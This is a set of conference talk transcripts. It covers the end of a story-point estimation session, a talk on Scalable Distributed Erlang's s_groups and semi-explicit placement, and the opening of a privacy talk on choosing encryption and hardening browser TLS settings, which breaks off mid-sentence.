that it doesn't matter who's going to do it because people with different skill sets can agree that building's a one, that building's a two. That to me is the fundamental benefit to story points. Does that make sense at all? Let me try it another way. You and I are going to program something. We're both programmers. We're both programmers. We're going to program something. In technology A, you're better than I am. In technology B, I'm better. But you and I can look at this one thing and we can both think about how long that's going to take. If we thought about something else, in that same technology, we would both say it's going to take twice as long. The fact that story points are grounded in time, the fact that they're about time, is what allows you and I to think about it in terms of our own skills, but still put a common unit on there. Maybe we can talk about it during the break, but I don't want to keep everybody on it. The key benefit is these people with different skill sets. We can maybe draw one out on a piece of paper to see the example. The idea is going to be with different skills, whether it's walking, JavaScript, whatever. If two people can look at something and say, this is easy, the JavaScript programmer that's good, the JavaScript programmer that's bad, can both look at that and say, that's a pretty easy JavaScript thing. The easy guy thinks it's going to take minutes. 
The hard guy thinks it's going to take hours, but they can both agree it's easy compared to the hard JavaScript thing, which would allow two people with different JavaScript skills to put a one on one and say a five on the other. Now it becomes a sequencing issue. I want the good person to do it, if available. I don't need to go to lunch right off, so I can hang around and take some more one on one questions. Let's go ahead and end there because we are at the official lunch time. Let's go ahead and end there. If you're interested in how we put this together in a plan, hang around an hour from now. We'll talk about putting this into a plan. Want more planning poker cards or other stuff I've got all up here? Help yourself. We'll talk about more planning poker cards.
|
The first step in creating a useful plan is the ability to estimate reliably. In this session we will discuss how to do this. We will look at various approaches to estimating including unit-less points and ideal time. The class will present four specific techniques for deriving reliable estimates, including how to use the popular Planning Poker® technique and other techniques that dramatically improve a project's chances of on-time completion.
|
10.5446/50850 (DOI)
|
Hi, I'm Natalia and thank you for coming. Thank you for watching. And I suppose we'll start, right? So I'm Natalia, I'm from the University of Glasgow and today I will talk about the RELEASE project, the work we do there. So the project is European and it involves something like eight partners. These are five academic partners from the UK, Sweden and Greece and three industrial partners. These are EDF, Ericsson and Erlang Solutions. In particular I will talk about the work we do at Glasgow University together with Kent and Heriot-Watt Universities. So I will give a brief introduction of the things we do and what the RELEASE project aims at in general. Then I will talk about the scalability limitations of distributed Erlang and then we'll cover what we do to scale it. So I'm not aiming to give all details but just a flavor of what we do, why we do that and how. So the purpose, the aim of the RELEASE project is to scale the radical actor model to build reliable software on massively parallel machines. And by that we mean something like 10^5 cores. And for that we use Erlang. We work on three levels. So the first level is the VM, then we have the language level and tools. Today I will talk only about the language level; the VM and tools will be covered sometimes by different people in different talks. So typical hardware architecture, what do we mean by that? Well, we're thinking about a cloud and actually a collection of clouds, something that's called a sky. And then clouds consist of hosts, and hosts, they consist of SMP modules, something like 6 or 8 of them, and each cloud would have something like 100 of those hosts and each SMP would contain 32, 64 cores, something like that. And then Erlang, just briefly reminding you what it is. So Erlang is a functional general-purpose programming language designed at Ericsson. It is dynamically typed and it was specifically designed to build distributed, scalable, soft real-time and massively concurrent software. And then it uses these two main philosophies, which is let it crash, and the second one is share nothing. The language primitives are processes and the particular very nice thing about it is that concurrency is built in in the language rather than added on. So distributed Erlang, what's it about? Well, we have a number of nodes, and those nodes, they can be either on the same host or they can be on different hosts, and these yellows are nodes by the way. Well, by node I mean an Erlang VM. And then inside of those, we have those processes and each node, it can use a number of cores. When Erlang works in its normal mode, it means the connections are transitive. So all nodes are interconnected and they have a global common namespace. By that I mean that if we register a name on one node globally, then it will be transitively connected, transitively shared between all nodes. And if we add another node over here, immediately, as soon as we connect to one of the nodes, it will be connected to the rest of the nodes. And then it's about explicit placement. So to spawn a process to a different node, we need to specifically define which node that is. And of course, Erlang and distributed Erlang is about reliability. So if one process, one node crashes, we can detect it and restart the system. So here we have a benchmark, it's Basho Bench code. So what we do is, oh my God, so we have 20 nodes, then within 18 seconds, we just kill all those processes. And the system again is in a stable state.
Then we start all those nodes again and the system is in a stable state again. But it has limitations. So we run this experiment and it's again Basho Bench. Well, it's a modification of Basho Bench, we call it DE-Bench. So what we do here is that we scale the number of nodes, so from 10 to 100. And then we look at the throughput. And then we vary the percentage of global operations that we have. So the red one is zero global operations. But then as soon as we start, you know, even this tiny, tiny percentage of global operations, the scalability goes down. And that is when we used the global module, but global operations are not only about the global module. You can also use something like RPC calls on multiple nodes and then you will get again global operations. Another problem is with single process bottlenecks. And we can see it here. So this is a Riak benchmark. Riak is a DBMS system built in Erlang. And so we look at scalability again. And here we have the number of nodes. This is the number of VMs, Erlang VMs. And then we scale them from 10 to 100. And then we look at throughput again. And what happens is that we have quite nice scalability up to 50, 60 nodes. And then it stops. And then it goes down with huge variation. And by the way, this is Riak version 1.1. So it was something like a year, one and a half years ago. So they updated, they modified some things there. But the problem there is that first we have these single process bottlenecks. And another problem is this fully connected network that we get with distributed Erlang. So design approach and principles. So we need to scale. To scale a system, to scale a program, we need to have a scalable persistent storage. And that we leave to Riak and Cassandra. And then we need in-memory data structures. And that's, in Erlang, these are ETS tables. And this work is done by Uppsala University and Ericsson within the RELEASE project. And then we need a scalable computation. And that's our work. When thinking about how we want to scale it, we took as a baseline those principles. So first of all, we wanted to work at the Erlang level as far as possible. Then we wanted to keep those modifications minimal because the language is nice. The language is simple. And people love the language. And we didn't want to introduce something absolutely foreign that the Erlang community would just reject and say, no, we don't like it. It's not our philosophy. Of course, we wanted to follow the language philosophy. And then we wanted to keep the Erlang reliability model unchanged and as reliable as it is now. And then there are two things that we want to change. That's avoiding global sharing, as shown on the previous slide, and introducing an abstract notion of communication architecture. So what is SD Erlang? SD Erlang is a small, modest extension to distributed Erlang. And here we tackle two problems. The first one is network scalability. We want to avoid all-to-all connections. And the second one is semi-explicit placement. And I will talk about those two problems in detail now. So network scalability. In Scalable Distributed Erlang, we have two types of nodes. These are free nodes, nodes that belong to no s_groups. And the other one is s_group nodes, nodes that belong to at least one s_group. And so nodes in s_groups, they have transitive connections. And they, so nodes within the s_group, they have transitive connections within the group and non-transitive connections with the other nodes.
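Just to give a feel for the connection counts involved, and the group sizes below are my own assumptions for illustration rather than measurements from the project, here is a rough Python sketch:

    # Rough illustration: number of connections with and without transitivity.
    def full_mesh_links(n):
        return n * (n - 1) // 2

    nodes = 100
    print(full_mesh_links(nodes))       # 4950 links if all 100 nodes stay fully connected

    groups, group_size = 10, 10         # assumed: ten s_groups of ten nodes each
    intra_group_links = groups * full_mesh_links(group_size)
    print(intra_group_links)            # 450 links inside the groups, plus only the few
                                        # non-transitive links the application opens itself

That difference is the whole point of keeping connections non-transitive outside a group.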
And then if you're familiar with distributed Erlang, you can say, well, there are similarities with global groups. Yes, there are. And the similarities are that groups have their own namespace and they have transitive connections within the groups. But the difference is that the groups are overlapping. And so we don't partition them as global groups do. And then the information about s_groups and nodes is not globally shared. So let's look at what happens here. So we have distributed Erlang and assume that we have two groups of nodes. So these three nodes are connected and these three nodes are also connected. Then we decide to connect nodes three and four. And what we get is a fully connected network because of the transitive connectivity. And then we look at s_groups. So we group nodes. And when we connect nodes three and four, they're just connected. Connections are non-transitive and each of the groups has its own namespace. The types of connections we have in general. So the thing is that we don't aim to replace the existing connections and existing nodes in distributed Erlang by those groups. So if a programmer doesn't want to use them, that's fine. But if they want to use them, these are the means to introduce them and communicate with other nodes. So first of all, we have these three nodes and these are free normal nodes that have transitive connections, a common namespace, the connections are normal. And then we have hidden nodes. Those hidden nodes, each of them has its own namespace. So if we register something globally, it doesn't actually change much because this information is not going to be shared with other nodes. And also, they don't share connections. So they just form direct connections and don't share them with anything. Then we have s_groups. So nodes are interconnected within s_groups and they have transitive connections within that s_group and non-transitive connections with the rest. And here we have the same. So another question that we thought of, of course, and are often asked, is why do we use s_groups? Why group nodes into those s_groups? Well, before introducing them, we had some requirements. We wanted nodes to join and leave s_groups very easily and quickly. Then we wanted to keep the philosophy of the language. That is, each node can be connected to any other node. And then we wanted that to be simple. And we looked at three other mechanisms, so something like grouping nodes according to their hash value. But that imposed some restrictions: if a node joins an s_group, then it should change its hash value. And when it leaves an s_group, it should also change its hash value. And if it belongs to multiple s_groups, there's again this contradiction with the hash value. So we decided to avoid that. And then another approach would be a hierarchical structure. But again, it contradicts the philosophy, because in this case nodes from different levels can't communicate directly with each other. So we decided to introduce overlapping s_groups. And using these overlapping s_groups, we can actually implement all three other approaches. So how can we group nodes? We have a set of nodes and then nodes are grouped into s_groups. And some of the nodes, we can call them gateways, for example, they form other s_groups. And then the gateways at those upper levels, they can form another s_group. So if node A wants to communicate with node N, what happens is node A communicates to B, B communicates to D, E, F, and then it's N.
So nodes actually don't form a direct connection to each other, but go through these gateways. We can also introduce something more complicated and introduce redundancy in the hierarchy. So instead of having one gateway node, we can have two, in case one of them fails. And then we can also communicate with free nodes and we can either connect them or not. And they will have non-transitive direct connections to the nodes in the s_groups. And then another approach. Well, we can have embedded groups. If we don't mind nodes being interconnected, but we want to reduce this global space, we want to localize it somehow, well, we can introduce embedded groups where nodes just share connections within their groups. So we can register names here and register names here. Then all of those nodes in the group will know that name. And how can we use those? So we can either set all of that configuration up at start time, in this case we will use a configuration file, or we can start dynamically using this new_s_group function. And we can use it either with one parameter, defining the s_group name, or not defining it. In this case, the s_group name will be generated automatically. And this is done because we don't guarantee the s_group names to be unique. So we don't collect this information anywhere. And in this case, what we guarantee is a high probability of name uniqueness. So not uniqueness, but a high probability of its uniqueness. And there are other functions we can use. So creating new s_groups, deleting s_groups, adding nodes and removing nodes. We can also collect some sort of information that we want. So information about s_groups, information about a particular node: to which s_groups it belongs, with which nodes it shares a namespace and so on. And these are the first measurements that we did with this. So this is, sorry, what's that? Good, yes. That's good, it works. Yes. So we have this tiny percentage, 0.01 percent of global operations. And we compare distributed Erlang and SD Erlang. And we have from 10 to 100 nodes. And we look at the throughput. So SD Erlang helps. That's good news. And so to look at how SD Erlang actually works, we'll look at an example of orbit. So what is orbit? Orbit is a symbolic computing kernel, a generalization of transitive closure computation. So what is it? We have an initially given space and then we apply a list of generators on this space. And from this, we generate a new list of, create a new list of numbers. And this process is repeated until no new numbers are generated. So that's the program. And we'll look at how, starting with non-distributed Erlang, we can come to Scalable Distributed Erlang, how we can build this program. Right. So the first question is, why orbit? Well, because it is similar to Riak and other DHT, distributed hash table, NoSQL database systems. Another one is, it uses peer-to-peer connections. And the third reason, well, it's very small and it's easy to understand. So we don't need to go into deep details of complicated programs. So we have this non-distributed Erlang and this is one node. We have one node and we have this master, workers, table and credit. So what happens is that we have a hash table and a master process. It spawns the first worker process. The worker process has just one number. And then we apply some generators on it and it generates a list of numbers. So what do we do with this first number?
With this first number, we check whether it's already in this table. If the number is in the table, then it just returns the credit to the master and it dies. If it's not, then it puts the value in the table, generates a new list and we repeat the process again. To make it distributed, what we need to do is modify the master and worker modules a little bit. So what happens now is that master and workers, they are on different nodes. And worker nodes, they contain this distributed hash table. So the table is now not on one node, but it becomes distributed. And the master, it again spawns a process, for example, to node one. But the node is defined by the value. So what we do is we have this first process. We take a hash value and this hash value defines to which node we actually spawn the process. For example, we spawn it to node one. And then we check whether the number is already in the hash table. If it's there, then the process just dies and returns the credit to the master. And if it's not, then it generates a new process and this procedure repeats. And now we have Scalable Distributed Erlang. So why do we want to change it? Well, because the problem grows, right? So we can have massive, massive requirements for this orbit. And it's not possible, neither for one node, nor for 60 or 100 nodes, to solve this problem anymore. So we want it to scale. And for that, we use Scalable Distributed Erlang. So it's again, what happens, we have this master node, but now we have these submaster nodes. But the hash table is still kept on those worker nodes. So the master generates the first number and then it decides, it takes the hash value and decides to which node it should actually go first, to which to spawn. For example, we want to go to group one. And then from this group one, when it arrives there on the first submaster, it takes the second hash value. And from here, it decides to which other node to go to. And then again, we repeat it. So here we need to modify master and worker again, and add two new modules. These are submaster and grouping. Well, here, as you notice probably, the transformation, the refactoring, is a bit more complicated than it was from non-distributed to distributed Erlang. And for that, a team at Kent University works to simplify life a little bit. Right. So now the master, the master process. So what we have here is that instead of, as in distributed Erlang, spawning worker processes, now the master process, it spawns to the submasters. And then on the workers, workers spawn the processes directly to other worker nodes only if it's in the same s_group. Otherwise, it would just spawn to the submaster, the master would spawn to another submaster, and then we do the routing. And then the submasters now, the submaster processes, they share the responsibility of the worker processes now, because they need to decide, need to route where those worker processes should go. And they also take some responsibility of the master processes, because they need to collect the credit and take care of those things. And then grouping. So we need to create a few groups. These are worker groups and we need to create a master group. And this is the result. So this one is, we measured on from one up to 160 Erlang VMs, and this was up to almost 1300 cores. And then what do we see here? So if you notice, the difference is not that large, the first thing. But orbit, first of all, we need to think about the nature of orbit. So it doesn't use global operations.
So what we actually reduce here is only connections. So the only thing that this shows is what effect this reduction of all-to-all connections has on orbit, on a particular program that requires all-to-all connections. And another thing I'd like you to notice is this flip, that Scalable Distributed Erlang actually, you know, changed the scalability for the better. So what are the other things we work on? Another thing is semi-explicit placement. So when we have this structured set of nodes, and some mechanism for how to call those nodes, it can be quite simple to remember those nodes. But what if we have a hundred thousand nodes? Well, for a programmer, then, explicitly naming every node becomes a bit of a problem. So we need something semi-explicit. And there are a number of reasons why we would want to spawn a process in a particular place. So probably we want to put close together processes that communicate with each other quite a lot. So we want to keep them together. Or we have a very large computation and we want to put it somewhere far away, somewhere far away so that it would be, for example, executed on a cloud and just reduce the load on our own machines a bit. And when we looked at it, well, we thought, well, actually, that looks very much like a tree structure. So we have something like racks of servers, right? And then we have a cluster. And then we have a cloud. And we can think of a method for how we can spawn them close and far away, depending on those distances. And here we use something defined, developed in math. Well, the math, it looks a bit scary, but it's not actually. And I'll explain it. So what we actually look at here is the distance, the common distance between nodes, those paths that nodes share between each other. So nodes B and C share two path segments, and it means the distance between them is one fourth, 2 to the minus 2. Whereas nodes B and G share only one, so the distance is a half, 2 to the minus 1. And then we have one. So it means that the larger this value, the further nodes are actually located from each other. And we can use this to actually define where we want to spawn our process. We did some measurements. And for these measurements we used our Beowulf cluster located at Heriot-Watt University in Edinburgh. So there are actually a few clusters over here. And what we found is, actually, yes, we can observe this tree structure when looking at the communication. Just a little bit to understand. So these are the names of our Beowulf nodes. And these are the communication times. So we can look at something like this, but I don't remember in which units it was measured. Never mind. I'm sorry. I'll check that. So it just shows how long it takes for processes on two nodes to communicate with each other. So how can we use this semi-explicit placement? Well, we can spawn onto nodes using some sort of parameters. And for that, we introduce the function choose_nodes. And it uses a list. And this list is introduced on purpose because we want to extend the ways in which we want to spawn those processes. So, for example, we can use an s_group name. And for example, we have nodes that belong to group one, and we have nodes that belong to no group. And node three can say, well, I want to spawn processes only on the nodes that belong to both of two s_groups, or to just one particular group. Another thing that we can do is we can use attributes. So each node, it can have attributes. What can these attributes be?
Well, that can be the software or hardware on which this particular node runs, or some other, I don't know, modules, something in the description of this node that we want to exploit. So we have s_group names, we have attributes, and then we can use distances. So for example, nearer than 0.4, or between 0.5 and 0.7, something like this notion of distance. This is a bit complicated, for example, for a programmer to know all these distances. So what we want to introduce later is to make it more automatic. So introduce something like nearest, furthest, a bit further, very close, something like that. So more intuitive, rather than forcing people to actually remember those numbers to exploit the system. And this, actually, well, the semi-explicit placement is also good for portability. Why do we want it? Because, well, I suppose I don't need to explain that we very often develop programs on one hardware architecture and then port them to another hardware architecture. So this portability is really important. And this nearest, closest will probably be a solution, or at least a help, to resolve those problems. Another thing that we work on is the semantics. So why do we need semantics? We want to reason about it. We want to explain, we want to understand what our system does. We want to know what sort of properties it has. And for that, we need some formal semantics. And we introduce semantics only for SD Erlang. And these are 16 functions. So something like 9, I think, 9 of these functions, they actually change the state. And the other functions, they don't change the state. They just return a value. And so what do I mean by that? So for example, if we want to create a new s_group, it means that we change the state, actually. But when we just want information about an s_group, we return a value, but the state, nothing happens, we just collect the information. And this is how our semantics looks. So we have a set of s_groups, a set of free groups, free hidden groups, and a set of nodes. And this defines the state. And the groups, all of them, are associated with a set of nodes. So for a free hidden group, there's just one node. And for s_groups and free groups, there's a set of nodes. And all of these groups have a namespace. But s_groups, they also have a name. And here, the first property, and it's quite obvious, but it's nice to see it from the semantics, is that a node can belong to only one of those categories. So it can be free hidden, free normal, or belong to s_groups. And this is how our semantics looks. So it means that we have an initial state, we apply a command on node n_i, and then the state changes and it returns a value. And this is a small example. This is the simplest one. So we have an s_group and we register a name. So we register a name in the s_group, it has the s_group name, it has a name, it has a pid, and it's just yes or no. So yes, registered; no, not registered. And we have the initial state: groups, free groups, free hidden groups, and nodes. We register a name in the s_group, with the s_group name, name and pid, on node n_i. And then we check whether this node n_i actually belongs to this s_group. And then we check whether this name or pid are already registered. And if all these conditions are satisfied, then we just register the name. And we modify the state and return true. Otherwise, return false. Well, all this is very nice and the mathematics is nice. But how do we know that we can actually trust this? Well, for this, we use QuickCheck.
And what it does is we have our s_group command and then we go in two directions with it. So the first direction is we actually execute this command in the real system. So we take the command and we get a new state. And we also go in a different direction: we take the operational semantics, calculate it using our mathematics, and then get a new abstract state. And for that, here we need a precondition. So the precondition for this particular command is that the set of nodes in the s_group can't be empty. So the s_group can't be empty. And we have a postcondition. And the postcondition is that the abstract states should be the same. They should be identical. And that was a really, really useful thing to do and to have. Because first of all, while writing the maths, we identified quite a number of errors and misunderstandings and miscoding in the implementation. And then while running this QuickCheck, we saw some problems with the maths and again with the implementation. So it was really helpful, really useful, and we hope to move forward with that. So future work. First of all, we have quite a lot of plans with semi-explicit placement. That is, as I said already, we want to change how we think about and how we apply those distances. So instead of numbers, actually giving some meaningful names to programmers. Another thing is we, oh right, so another thing is we want to look at robustness. So what happens if a node fails, how does the system know about it? And of course, automation. Because just now, all this information is, you know, hard-coded, it's just in the configuration. And what we want, we want the system to provide us this information. And of course, running and testing the system. So first of all, look at how Sim-Diasca runs, our benchmark, this is a simulation engine, run it and see how it works. And it's quite a large one. It's EDF's and it's on the Blue Gene and it's something like 65,000 cores. Also, we want this SD Erlang to become standard. We want to improve it. We want to work on it and we want it to be included in the OTP. Of course, we continue to work on SD Erlang. We found it really useful, really, just how we think, how we understand the system, and the methodology. So how we actually go from a distributed or non-distributed application to an SD Erlang application, how we refactor it and what we need to do then. So these are some links, if you find them interesting: a bit about the RELEASE project, the OTP, the modifications, I'm sorry, to the OTP. These are the benchmarks that we use here. Percept2 is a tool we work on in the RELEASE project. Then BenchErl. This benchmark is more for if you're interested in the scalability of the VM, because in the RELEASE project we also work on the VM level and that is already in the releases. So if you want to see how different releases change scalability, that will be quite an interesting tool to play with. And Sim-Diasca, if you're interested in the simulation engine that we are going to use, the information is there. And thank you. So feedback, questions, very welcome. Thanks. Any questions? Right, yeah. You mean SD Erlang, right? Yeah. Well, earlier in the slide deck, you had some parent set of nodes that were obviously references to things. And what are they in this list? I know. I think this is just links. But if you let me know what sort of information you're interested in, I'll be happy to give links and put them into slides and share whatever. Right. Well, great. Thank you. Thank you for coming and thank you for listening. Thank you.
|
In this talk I'll present Scalable Distributed (SD) Erlang -- an extension of distributed Erlang functional programming language for reliable scalability. The work is a part of the RELEASE project that aims to improve the scalability of Erlang programming language. I'll start by providing an overview of the RELEASE project and discussing distributed Erlang limitations. Then I'll introduce SD Erlang, its design, motivation, and the main two components, i.e. scalable groups and semi-explicit placement. The scalable groups (s_groups) enable scaling the network of Erlang nodes by eliminating transitive connections, i.e. a node may belong to multiple s_groups where each s_group node has transitive connections with the nodes from the same s_groups and non-transitive connections with other nodes. The semi-explicit placement enables to spawn processes on nodes either in a particular s_group, or with particular attributes (e.g. available hardware or software), or with certain parameters (e.g. least load). I’ll also cover the results of the preliminary validation, and SD Erlang operational semantics and its verification. I'll conclude the talk by providing a brief overview of the ongoing work and our future plans.
|
10.5446/50851 (DOI)
|
Okay. I think we can start. Hello, everybody. Welcome. This talk is an experiment for me. I'm now 50 years old and I have a strong background in computer science, with some main focus on service-oriented architecture and on C++. And last year, I was really fed up, because I learned that, besides knowing that when I send emails there's some danger that people read them, in practice the reality is a lot worse. Or to say it with the words of Tim Pritlove, one guy at the Chaos Computer Club conference in Germany last year: we woke up out of a nightmare to find the reality was even worse. We had assumed a couple of things before, but we didn't know how much privacy is an issue, or non-privacy is an issue, in this world. So I'm fed up, but I don't want to give up, because you can, of course, argue, well, secret services and other people who care for breaking privacy, maybe for some good reasons, they can do everything. So you have no chance to win this fight. So I want to contribute and help so that at least this fight becomes more complicated. I'm still learning. It's a new topic for me to some extent. And this talk has the idea of both: I'm telling you what I understood so far, what I learned, and how I contribute, and maybe, if you are willing to help make this world a little bit better from my point of view, how you can contribute. So let's start. I don't want to discuss the whole issue of whether it makes sense or not, but just let me state one thing. In 1948, the Universal Declaration of Human Rights was signed, driven by Roosevelt and others. And in one of the articles, privacy is explicitly an issue. And now we have challenges to that. As I said, there might be good reasons, but at least in Germany we learned that the Chancellor's mobile phone was, well, was monitored by the NSA, by the U.S. That was probably approved, and they presumably don't assume that our Chancellor is a terrorist. So there are other things behind it. And for these other things, I think that's important for a couple of reasons, not just for my privacy, but also for privacy in companies and also to protect other people. So there's one reason you might care about privacy even if you don't have something to hide, which is that we have to make privacy a general usage, because otherwise those people who encrypt are immediately the people who are in focus. So we have to protect those who need privacy. So that might also be a reason to help in this area. Okay. So if you are interested, read this article by Martin Fowler, which you might have heard about, on why this is an issue. So far for the motivation. So let's jump into details. Before I go into what I learned and what just I myself can do, and it's a very practical thing, I'm not bringing the whole issue to the table to discuss every detail and everything we could do, let me at least introduce some theory about encryption, which is needed here. We have in principle three ways of encryption. The first is symmetric encryption. So we agree on a password, and we both have to know the password. Or we use it when we store data in a file: I use a password, and then when I read it again, I use the same password. So there are encryption algorithms for that. And then we have asymmetric encryption, which is pretty important as you will see later on for email and other stuff, where encryption uses a different password than decryption. This is safer but less convenient.
And then we have hashing, which is for signing data, so for protecting the integrity of data, ensuring that this data was not modified. So with this short introduction of theory, let me show you one important thing, and that is: if you sign or if you encrypt, that doesn't mean your data is protected, because it all depends on how good the encryption algorithms are. It depends on how good the hash functions are. And you see here, on this list from some guys, but it's in principle a common agreement, which encryption and hashing functions are broken. Broken means, for example, that we know that secret services can read them live while they are in transit. So for example, RC4 is broken. If you use SSL in a browser, RC4 is one of the valid protocols. So if you have the impression the communication with a server is safe, it might simply not be the case. We come to that later. And similar for hash functions and other algorithms. So be careful. We have to use better encryption. We especially learned that secret services like the NSA try to influence new encryption algorithms so that they have a backdoor inside. And in fact, what happens right now is that the cryptographic experts in the world are trying to find new algorithms with the explicit request that the algorithm is not allowed to come from the NSA. So that we hope we can be sure that there is no backdoor inside the algorithm itself. To give you some numbers: the NSA has 1000 experts only caring for the decryption of encrypted data, only the mathematical side, et cetera. The whole manpower of trying to investigate privacy and break privacy is like the population of all people in Norway; it's the same number of people involved. So we have something, well, some people who have at least a lot of resources and manpower. The good news is mathematics is our friend. So if there's no backdoor, encryption helps us. But we need large enough keys and we need valid algorithms. So therefore, for example, we currently recommend using keys with at least 4096 bits, and not less. And mathematics is our friend: the more bits we have, as it is a logarithmic curve, a lot more power is needed to decrypt something. So the more bits we have, the more mathematics is our friend. So that's the theory, and that's also just some practical information about the theory. So now let's start. The first thing I can do is, well, I should say, privacy is not only about secret services. Privacy is about data I want to hide, data where I want to avoid that other people, or even other companies, have it and use it. And as you know, one company or a couple of companies are now collecting data, which is fine. My daughter is happy to use Facebook, et cetera. And I even use Google. However, I'm not so happy that Google is able to see which topics I'm searching for. So one first thing I can recommend to you, if you want to Google without letting Google find out who Googled what, is Startpage, startpage.com. It's a website. They have a contract with Google. It's not an illegal or unofficial search. It's just a wrapper you can use. And if you search here for just some term, this search is redirected to Google, but without your IP address. Which also has some drawbacks. I mean, you don't get personalized answers that are ideal for your personal benefit. Yeah, because they don't know that it's you searching.
So it's always some good and bad things and you have yourself to decide. But in any other sense, it's as good as fast. I use it now a lot. And this is by the way one example where privacy, more privacy doesn't cost us any convenience or any inconvenience. So that's, that's good. That's the first, that's the easy recommendation. So let's talk about browsing in general. As I said already, in principle, it's possible in browsers to enable encrypted communication, encrypted communication means not that nobody can track who is communicating with which browser, but it's at least hidden what we exchange as data. To use approaches where even it's not possible to see who is communication with which side, you need other approaches like Tor, etc., which I don't handle here in this talk. For me, it's good enough right now to think a little bit about when I have a connection with my bank. I want to ensure that this data can't be read by any other company or any other agency. So as I said before, of course, you should use SSL, which means HTTPS. But the problem is some of the algorithms are broken. So how can we deal with that? Well, you have to configure your browser. And as usual, it's always very easy to configure browsers in the world of Mozilla, so Thunderbird and Mozilla Firefox. And it's probably more an effort in other browsers. So I give you some examples how to configure Mozilla here better. And before I do that, this is a website where you can find out which encryption protocols your browser accept and would accept and in which order with which priority. So we don't have to understand here everything about that. I will talk a little bit about some of the issues here. But you see these are close to 30 different protocols we use to exchange data in an SSL communication. So some of them are broken, some are not. So if you look here around, maybe you see something like RC4 somewhere just at the bottom, RC4. I told you RC4 is broken. So the good news here is it's on the bottom here. So it's the least thing we try out. There's also other RC4 in the middle. Yeah, probably there are a couple of them. So this is something with every browser you use, if you go to this website, that will tell you what you prefer and in which preference. So and then let's do something about that. So let me tell you one story and one additional fact which is private, a perfect forward secrecy, a PFS. PFS is very, very, very important for you because there's one important thing. Beside the quality of the algorithm you use, there might be another problem and the other problem is that all connections to a server use the same keys, the same keys to encrypt the data. So guess somebody has broken that key, just due to one communication, then all the communication is open and if they video data all the past communication on their servers, they can even read all the communication from the past, just when they got the key. This is by the way what happened with Lava Bit. You might have heard about this case where they closed an email website and they used one central key for all communication and it might not even, it might not be the case that just you say, well, somebody stole the key or got the key from somewhere or so ever. It's also an issue, well, there are roots in these worlds and there are good reasons that by law people are forced to give out keys. So if there is a terrorist, I'm still interested that we track this data. 
But this should not mean that they track all the data of all communication, in future and in the past, of all people connecting to that site. And to avoid that, you need PFS, because PFS creates an individual key for every communication between each server and each client. So if, for example, by law you are forced to hand out the key for a certain person who connects to a certain server, with PFS this does not mean that any other communication is open to the public. If you don't use PFS, handing out the key or losing the key to somebody else means everything is open in the communication with this server. So PFS is something you should really care about and look for. So what can I do? As I said, in concrete terms I can, for example, in my different browsers disable some of the protocols. The easier place to do that is in Mozilla Firefox. It's also possible in Internet Explorer with a little bit more tricky stuff, and probably in other browsers also. Here you see how I can do it with a browser. I select just all the SSL3 options. Look at the left: I select all the SSL3 exchange options, and then I disable all those where RC4 is mentioned. By this, I disable encrypted communication, SSL or HTTPS connections, using RC4. What else have I done here? On the top right, there's a security.tls.version.min setting. This is the minimum exchange protocol we use. The default is zero, and there are better values; the best value is three. But unfortunately, if you disable some of these values and the servers don't offer better algorithms, you are not able to connect to your server any longer. So that means by raising this value, it's more likely that you can't do your online bank account handling any more, or whatsoever. That you have to find out. And by the way, what I do is: as a default browser I use Mozilla Firefox, and then, if I can't connect due to my settings, I use Internet Explorer. But then I know that this is an insecure communication, although HTTPS is signaled there. So here are the recommendations I can give so far. Disable all the settings with RC4. Use so-called TLS 1.2, that is the minimum version three. If that doesn't work, use as a minimum TLS version two or one, et cetera. By the way, in Germany at least, we now have an official government recommendation to support some of the better protocols. For example, if you connect to servers of the government, these servers are required to support TLS 1.2. This is probably not the case in every country and not in the business world. But that's something you should, for example, ask your bank about, or, if you are programming in a bank, change your servers. Often it's just an option in your Apache web server to do that. One reason not to turn on the better encryption might be resources, because the better the encryption algorithm is, the more resources you need on the servers. So there might be a price when you're running servers with better encryption. Okay. And for PFS, which, as I said, hands out individual keys for each connection, you should enable only those SSL3 protocols using DHE or ECDHE. When I do that, I really have a couple of problems connecting to other websites. So it's still only supported in a limited way, but we hope that in one or two years, if we have enough pressure, and if you send just enough emails complaining "I can't connect any more to your so-called secure server", this will change.
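The same idea, expressed in code rather than in about:config: a client that refuses anything below TLS 1.2, only accepts forward-secret (ECDHE) cipher suites, and reports what a server actually negotiates. This is a sketch with Python's standard ssl module; it mirrors the browser settings described above, but it is of course not what Firefox does internally.

```python
import socket
import ssl

ctx = ssl.create_default_context()
ctx.minimum_version = ssl.TLSVersion.TLSv1_2     # refuse SSL3, TLS 1.0 and TLS 1.1
ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20")   # TLS 1.2: forward-secret suites only
# (TLS 1.3 suites are configured separately and always provide forward secrecy.)

def check(host: str, port: int = 443) -> str:
    try:
        with socket.create_connection((host, port), timeout=5) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                name, _, bits = tls.cipher()
                return f"{host}: OK, {tls.version()} {name} ({bits} bits)"
    except ssl.SSLError as error:
        # Roughly the situation Firefox reports as ssl_error_no_cypher_overlap.
        return f"{host}: handshake refused, {error}"

print(check("startpage.com"))   # the site mentioned earlier, just as an example
print(check("example.com"))
```

If a line prints a refusal, that is exactly the trade-off described above: stricter client settings mean some servers simply cannot be reached until they are upgraded.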
So here, with my settings, I reduced it to only accept PFS servers, and then I still have a couple of different options to choose from. But as I said, a server has to offer this protocol. If not, I get something like this. This is unfortunately a German message, but you can see in the middle the error code, the Fehlercode, which is ssl_error_no_cypher_overlap. So we have no overlapping cipher which we both agree to support. And if you want to understand more details about this and inspect websites better, I recommend Calomel; Calomel SSL Validation is an add-on for Mozilla. On the upper left they create a colored icon, and this icon signals how secure the SSL connection is that you are using. If it's red, then it's really bad. If it's blue, it's okay; green is perfect. And what I opened there is: you can then click on it and see the details. Without clicking on it, you don't see this big picture with all the details; you just see your ordinary website and just the icon there on the left. And as you can see here, for example, on the left side, this is, oh, no, no, this is the Startpage site I just mentioned, sorry, not that new upcoming email service with encryption support. And you see that when I sent my request to them, they, for example, support PFS, which gives 20 of 20 points for the rating behind the color of this icon. They change from time to time what is necessary to be green, to get 100 percent. As you see, this website is rated at 88 percent. Half a year ago it was 100 percent, I guess. So you always have to fix things according to new findings, new standards, and whatever we found out as being broken. Here on the right side, that's one bank in Germany. Is it still working? Yeah, okay. That's one bank in Germany, the Volkswagen bank; the German car company also has a bank, any car vendor now has a bank. And as you see, they are not that perfect with their support. They have 34 percent. And you see they have no PFS, for example: in the middle, PFS, zero of 20 points. Which means if somebody by law gets a key to validate the connection between any customer of this bank and this bank, with this key they can inspect all the data I exchange with this bank in the future, and in the past, if they just recorded my communication in the past when they couldn't yet read 